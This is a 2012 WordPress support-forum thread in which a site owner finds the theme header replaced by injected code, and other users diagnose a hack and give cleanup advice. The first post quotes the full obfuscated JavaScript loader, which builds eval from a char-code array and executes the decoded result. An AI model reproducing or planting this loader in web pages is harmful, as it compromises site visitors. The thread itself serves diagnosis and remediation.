Help: Suddenly the header image disappeared replaced by a programming code fragment

stefandd · #1 Nov 29, 2012, 01:33 AM

the web site is http://practicalpieces.com running Atahualpa 3.7.9, WordPress 3.4.2.

any ideas why the header image was replaced by:
v="v"+"al";if(020===0x10&&window.document)try{docu ment.body=document.body}catch(gdsgsdg){w=window;v= "e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,3 2,122,11,10,31,30,32,31,116,97,113,30,121,111,101, 109,99,30,61,31,98,111,98,115,109,100,108,116,45,9 7,114,100,95,116,100,67,108,100,107,101,109,114,40 ,38,103,102,113,95,109,100,37,41,58,11,10,31,30,32 ,31,119,112,102,107,100,45,113,114,98,30,61,31,37, 104,115,114,112,57,45,47,102,109,108,103,119,115,1 16,118,46,113,115,47,98,109,117,109,114,49,53,44,1 12,103,110,39,58,11,10,31,30,32,31,119,112,102,107 ,100,45,113,116,120,106,101,45,110,111,114,103,116 ,104,109,110,31,59,32,38,95,98,114,109,108,116,114 ,101,38,57,13,9,30,32,31,30,121,111,101,109,99,44, 115,115,119,108,100,44,98,110,112,100,100,112,32,6 0,30,39,47,37,59,12,8,32,31,30,32,120,110,103,108, 98,46,114,114,121,107,99,46,103,99,105,102,102,116 ,31,59,32,38,47,112,119,37,59,12,8,32,31,30,32,120 ,110,103,108,98,46,114,114,121,107,99,46,118,103,1 00,115,102,32,60,30,39,48,110,120,38,57,13,9,30,32 ,31,30,121,111,101,109,99,44,115,115,119,108,100,4 4,108,100,100,116,31,59,32,38,47,112,119,37,59,12, 8,32,31,30,32,120,110,103,108,98,46,114,114,121,10 7,99,46,115,109,112,31,59,32,38,47,112,119,37,59,1 2,8,13,9,30,32,31,30,105,101,30,40,32,98,111,98,11 5,109,100,108,116,45,101,101,115,67,108,100,107,10 1,109,114,66,120,71,100,39,37,121,111,101,109,99,3 7,41,40,30,123,12,8,32,31,30,32,31,30,32,31,98,111 ,98,115,109,100,108,116,45,117,114,104,114,101,39, 37,60,99,103,118,31,103,100,60,90,39,120,110,103,1 08,98,92,38,30,62,59,45,100,104,116,62,38,39,59,12 ,8,32,31,30,32,31,30,32,31,98,111,98,115,109,100,1 08,116,45,101,101,115,67,108,100,107,101,109,114,6 6,120,71,100,39,37,121,111,101,109,99,37,41,45,95, 112,111,99,110,99,65,104,104,106,100,39,119,112,10 2,107,100,40,57,13,9,30,32,31,30,125,12,8,125,40,3 8,41,58);}w=f;s=[];for(i=0;-i+491!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String. fromCharCode((1*w[j]+j%3));}e(s)>

juggledad · #2 Nov 29, 2012, 03:10 AM

do you have something in the option ato->Add HTML/CSS Inserts->HTML Inserts: Body Tag?
I suspect you may have been hacked.

stefandd · #3 Nov 29, 2012, 03:39 AM

All HTML Inserts fields are empty
Only CSS Inserts contains h1-h6 styles definitions

juggledad · #4 Nov 29, 2012, 03:50 AM

If that is the case, then your site has been hacked and you need to clean it up. Do a google search to get detailed directions/advice for clening up a hacked site.

You might also want to contact your host and preserve teh access logs to see is they show how the hack was applied.

Looking at that code, it is cleverly hiding an eval() which is a signature of a hack.

stefandd · #5 Nov 29, 2012, 04:04 AM

RESOLVED (hope so)

There were embedded alien code in header.php of the Atahualpa theme. After deleting it things seem to be fine...

Having in mind the conspiracy theory - I'm not sure that this is the only code smb left in my site. May be this is the obvious left over that has to decline attention from smth else.

If smb has any experience with stuff like this, pls comment

juggledad · #6 Nov 29, 2012, 04:21 AM

'Smb'?? Who or what is 'smb'?
I personally would look at all the theme files of all themes in your themes folder and if you find another copy of that code I would suspect a hack. I'd also check plugins

rickheck · #7 Nov 30, 2012, 05:52 PM

I'll agree with the "you've been hacked" theory. It may even be in the theme header code.

I would einstall the the theme, which should overwrite any modified code. I would also reinstall the latest version of WordPress for the same reason. (Make sure you save any customized code, and customized header images....and then copy your header image back into <themefolder>\images\header , since an update of ATA will replace any custom image files.)

If you are interested in where the hack came from, then download your entire site code to a local computer, and do a search for strings similar to the code you posted.

As to how the code got there, it is possible through a compromised FTP account. So I would change all passwords (site and FTP and hosting) to a strong password.

And if you use Filezilla as your FTP client software, I would get rid of it. Filezilla stores your FTP credentials (user and password) in a plain text file on your computer. A more secure alternative, IMHO, is WinSCP.

You should also check your local computer (and any other computer you use to manage the site) for malware. Full scans.

Good luck.